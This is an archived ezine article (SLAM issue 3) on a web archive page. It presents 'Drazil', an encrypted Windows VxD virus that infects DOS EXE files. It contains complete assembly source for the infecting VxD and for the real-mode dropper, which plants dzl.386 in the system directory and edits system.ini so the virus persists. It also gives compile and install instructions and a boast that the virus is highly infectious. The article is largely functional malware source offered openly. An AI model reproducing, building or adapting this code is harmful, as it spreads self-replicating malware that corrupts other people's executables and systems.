Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SLAM3.033: Encrypted vxd exe infector *Drazil* by Reptile

eZine's profile picture
eZine lover (@eZine)
Published in 
Slam
 · 2 years ago

Comment @ Drazil by Reptile

This virus is an encrypted vxd exe infector.

The vxd (dzl.386) infects exe files (not ne/pe) on execution (4b00h) in the standard manner. It restores time/date/attribut (reset) of the victims and its size is 5142 bytes, coz you'll need the Windoze 3.11 DDK to compile it (argh!). But anyway Drazil increases hosts only :) by 2869 bytes (it doesn't store the 2778 bytes of zeros, which are created by masm). To mark a file as infected, the virus takes a random value (8 bit) and xors it with 255, then it writes this word to the offset at 12h of the exe header.

When an infected file is run, the encrypted (just a little so you can't see the conspicuous strings) real mode portion checks for the vxd and then jumps back to the host or if the vxd isn't found it places dzl.386 in the 'c:\windows\system', the 'c:\windows.000\system' or the 'c:\win95\system' directory and loads it in the system.ini. Then it shows 'Error: [Drazil] by Reptile' (payload) and terminates. After the next reboot the vxd is in memory and infects every executed exe file.

To install Drazil run the file infected.exe or copy the vxd to one of the three usable paths, then add manually the line 'device=dzl.386' to the [386Enh] section of the system.ini and do a reboot.

This virus should also work under Windoze 3.xx, but I'm not sure coz I couldn't test it.

If one of the three paths is available Drazil is *highly* infectious. When I tested it, my whole system was really fast infected. So use it with care! :) 

Compiling dzl.386: (.386p code) 
masm5 -p -w2 dzl.asm 
link386 dzl.obj,dzl.386,,,dzl.def 
addhdr dzl.386 

Compiling drazil.inc: (.286 code) 
tasm /m2 drazil.asm 
tlink /t drazil.obj 
file2db drazil.com (or another db generator) 
modify drazil.dat 
@ 

.386p 

.xlist 
include vmm.inc 
.list 

Declare_Virtual_Device DZL, 1, 0, DZL_Control, Undefined_Device_Id, \ 
Undefined_Init_Order,, 

VxD_Locked_Data_Seg 
include drazil.inc ;realmode code 
header db 512 dup (0) 
VxD_Locked_Data_Ends 

VxD_Locked_Code_Seg 
BeginProc DZL_Device_Init 
mov ax,3d02h   ;open the vxd 
lea edx,dropname1   ;in the 'c:\windows\system' dir 
vxdint 21h 
jnc short rd 

mov ax,3d02h   ;open the vxd 
lea edx,dropname2   ;in the 'c:\windows.000\system' dir 
vxdint 21h 
jnc short rd 

mov ax,3d02h   ;open the vxd 
lea edx,dropname3   ;in the 'c:\win95\system' dir 
vxdint 21h 
jc short e  ;skip it 

rd: 
xchg ax,bx 

mov ah,3fh   ;store the first part of the vxd 
mov cx,2342 
lea edx,store 
vxdint 21h 
jc short e  ;skip it 

mov ah,3eh 
vxdint 21h 

mov eax,21h ;install int 21h handler 
mov esi,offset32 int21h 
VMMcall Hook_V86_Int_Chain 
e: 
clc 
ret 
EndProc DZL_Device_Init 

BeginProc int21h 
cmp [ebp.Client_AX],4b00h   ;exec call 
jne prevhook 

Push_Client_State ;save regs 
VMMcall Begin_Nest_Exec 

movzx edx,[ebp.Client_DS] ;get the name 
shl edx,4 
movzx eax,[ebp.Client_DX] 
add edx,eax 
add edx,[ebx.CB_High_Linear] 

mov ax,4300h ;save attribut 
vxdint 21h 
push ecx 

mov ax,4301h ;set normal attribut 
mov cx,20h 
vxdint 21h 

mov ax,3d02h   ;open file 
vxdint 21h 
jc exit 
xchg ax,bx 

push edx ;save the name 
mov ax,5700h ;save time/date 
vxdint 21h 
push ecx 
push edx 

mov ah,3fh   ;read header 
mov cx,512 
lea edx,header 
vxdint 21h 

cmp word ptr [header],'ZM'  ;exe? 
jne cfile 
cmp word ptr [header + 0ch],0ffffh ;allocate all mem? 
jne cfile 
cmp word ptr [header + 18h],40h ;win exe? 
je cfile 
;don't infect command.com 
cmp word ptr [header + 40h],'9' ;german command.com? 
je cfile 
cmp word ptr [header + 40h],'2l' ;english command.com? 
je cfile 
mov al,[header + 12h] ;infected? 
xor al,255 
cmp byte ptr [header + 13h],al 
je cfile 

;save ss:sp 
mov ax,word ptr [header + 0eh] 
mov sseg,ax 
mov ax,word ptr [header + 10h] 
mov ssp,ax 

;save cs:ip 
mov eax,dword ptr [header + 14h] 
mov csip,eax 

mov ax,4202h ;eof 
xor cx,cx 
cwd 
vxdint 21h 

;calc new cs:ip 
mov cx,16 
div cx 
sub ax,word ptr [header + 8] 

mov word ptr [header + 14h],dx 
mov word ptr [header + 16h],ax 

add dx,vend ;calc stack 

mov word ptr [header + 0eh],ax 
mov word ptr [header + 10h],dx 

;8 bit xor encryption 
rdnm: 
in al,40h 
or al,al 
je rdnm 
mov byte ptr [encval],al ;save random value 

mov edi,offset32 encstart 
mov cx,encend - encstart 

xl: 
xor byte ptr [edi],al 
inc edi 
loop xl 

;write virus 
mov ah,40h 
mov cx,vend - start 
mov edx,offset32 start 
vxdint 21h 

;undo 
mov al,[encval] 
mov edi,offset32 encstart 
mov cx,encend - encstart 

xll: 
xor byte ptr [edi],al 
inc edi 
loop xll 

mov ax,4202h ;eof 
xor cx,cx 
cwd 
vxdint 21h 

mov cx,512 ;calc pages 
div cx 
or dx,dx 
jz short np 
inc ax 
np: 
mov word ptr [header + 4],ax 
mov word ptr [header + 2],dx 

mov ax,4200h ;bof 
xor cx,cx 
cwd 
vxdint 21h 

rnd: 
in al,40h ;set infection flag 
or al,al 
je rnd 
mov byte ptr [header + 12h],al 
xor al,255 
mov byte ptr [header + 13h],al 

mov ah,40h   ;write new header 
mov cx,1dh 
lea edx,header 
vxdint 21h 

cfile: 
mov ax,5701h ;restore time/date 
pop edx 
pop ecx 
vxdint 21h 

mov ah,3eh 
vxdint 21h 

pop edx ;restore name 

mov ax,4301h ;restore attribut 
pop ecx 
vxdint 21h 

exit: 
VMMcall End_Nest_Exec 
Pop_Client_State 

prevhook: 
stc 
ret 
redwopdrazilcigamecin db '˙˘',7,'+**+',7,'˘˙' 
EndProc int21h 

BeginProc DZL_Control 
Control_Dispatch Init_Complete,DZL_Device_Init 
clc 
ret 
EndProc DZL_Control 
VxD_Locked_Code_Ends 

VxD_Real_Init_Seg 
BeginProc DZL_Real_Mode_Init 
xor bx,bx 
xor si,si 
mov ax,Device_Load_Ok 
ret 
EndProc DZL_Real_Mode_Init 
VxD_Real_Init_Ends 
End 

⁄ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒø 
≥ File: Drazil.asm                                                           ≥ 
¿ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ 

;Drazil's real mode portion 

.286 

.model tiny 

.code 
org 100h 
start: 
;get delta 
call $ + 3 
drazil:pop bp 
sub bp,offset drazil 

push ds ;coz psp 
push cs 
pop ds 

;decrypt it 
db 176 ;mov al 
encval db 0 

lea di,[bp + offset encstart] 
mov cx,encend - encstart 
xd: 
xor byte ptr [di],al 
inc di 
loop xd 

encstart: 
;get the windoze path 
lea dx,[bp + offset sysini1] 
call attr 
mov ax,3d02h    ;c:\windows\system.ini? 
int 21h 
jnc win 

lea dx,[bp + offset sysini2] 
call attr 
mov ax,3d02h    ;c:\windows.000\system.ini? 
int 21h 
jnc win000 

lea dx,[bp + offset sysini3] 
call attr 
mov ax,3d02h    ;c:\win95\system.ini? 
int 21h 
jc e 

win95: 
push ax ;save handle 
mov ax,3d00h    ;check if dzl.386 is already installed 
lea dx,[bp + offset dropname3]  ;c:\win95\system\dzl.386 
int 21h 
jc inst 

ee: 
;exe return 
pop ax 
e: 
;exit: jmp back to the victim 
pop ax ;psp 
add ax,10h 
add word ptr [bp + offset csip + 2],ax 

;stack 
db 5 ;add ax 
sseg dw 0fff0h ;test 
mov ss,ax 

db 0bch ;mov sp 
ssp dw 0fffeh 

db 0eah 
csip dd 0fff00000h 

win: 
push ax 
mov ax,3d00h 
lea dx,[bp + offset dropname1]  ;c:\windows\system\dzl.386 
int 21h 
jc inst 
jmp ee 

win000: 
push ax 
mov ax,3d00h 
lea dx,[bp + offset dropname2]  ;c:\windows.000\system\dzl.386 
int 21h 
jnc ee 

inst: 
mov ah,3ch  ;nope: install dzl.386 
xor cx,cx 
int 21h 
xchg ax,bx 

mov ah,40h  ;write the first part of the vxd 
mov cx,2342 
lea dx,[bp + offset drop] 
int 21h 

;write the zeros (by masm) - masm sux! 
mov cx,2778 

lk: 
push cx 
mov ah,40h 
mov cx,1 
lea dx,[bp + rbuf] 
int 21h 
pop cx 
loop lk 

mov ah,40h ;write the end 
mov cx,22 
lea dx,[bp + offset ddb] ;this is the end... 
int 21h 

mov ah,3eh 
int 21h 

;load the vxd in the system.ini 
pop bx ;handle 

push cs 
pop es 

mov ax,4202h ;get file size 
xor cx,cx 
cwd 
int 21h 
push ax 

mov ax,4200h ;bof 
xor cx,cx 
cwd 
int 21h 

cd: 
mov ah,3fh ;search the [386Enh] section 
mov cx,1 
lea dx,[bp + offset rbuf] 
int 21h 
or ax,ax 
je cd 
cmp [bp + rbuf],'n'   ;[386E'n'h] 
jne cd 

mov ah,3fh ;really? 
mov cx,2 
lea dx,[bp + offset rbuf] 
int 21h 
cmp word ptr [bp + rbuf],']h' 
jne cd 

mov ax,4201h    ;save current offset 
xor cx,cx 
cwd 
int 21h 
pop cx 
push ax 

sub cx,ax ;read the second part of the file 
mov ah,3fh 
lea dx,[bp + offset rbuf] 
int 21h 

mov ax,4200h    ;go back 
pop dx 
push cx 
xor cx,cx 
int 21h 

mov ah,40h  ;insert 'device=dzl.386' 
mov cx,16 
lea dx,[bp + offset dropstring] 
int 21h 

mov ah,40h  ;write the second part of the file 
pop cx 
lea dx,[bp + offset rbuf] 
int 21h 

cfile: 
mov ah,3eh 
int 21h 

exit: 
;payload 
mov ah,09h ;I'm a Lizard 
lea dx,[bp + offset error] 
int 21h 

mov ah,4ch 
int 21h 

attr proc near 
mov ax,4301h    ;change attribut 
mov cx,20h 
int 21h 
ret 
attr endp 

error db 'Error: [Drazil] by Reptile$' 
dropstring db 13,10,'device=dzl.386' 
ddb db '3€3ˆ∏',0,0,'√',0,0,0,7,'DZL_DDB',1,0,0 
rbuf db 0   ;readbuffer 
dropname3 db 'c:\win95\system\dzl.386',0 
dropname2 db 'c:\windows.000\system\dzl.386',0 
dropname1 db 'c:\windows\system\dzl.386',0 
sysini3 db 'c:\win95\system.ini',0 
sysini2 db 'c:\windows.000\system.ini',0 
sysini1 db 'c:\windows\system.ini',0 
drop db 2342 dup (?) 
encend: 
ends 
end start

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

guest's profile picture
@guest
24 Nov 2024
Hi, I noticed a few problems with your website. Is this a good place to send them them? Have an awesome day, Martin
eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
It was brought to my attention that there’s a mistake as this article appears to be empty. Unfortunately, it’s not a mistake. The first i ...
eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
Thanks for the comment. I'm glad to know that my archiving work is useful to someone! You can find more ezines by checking out my profi ...
guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT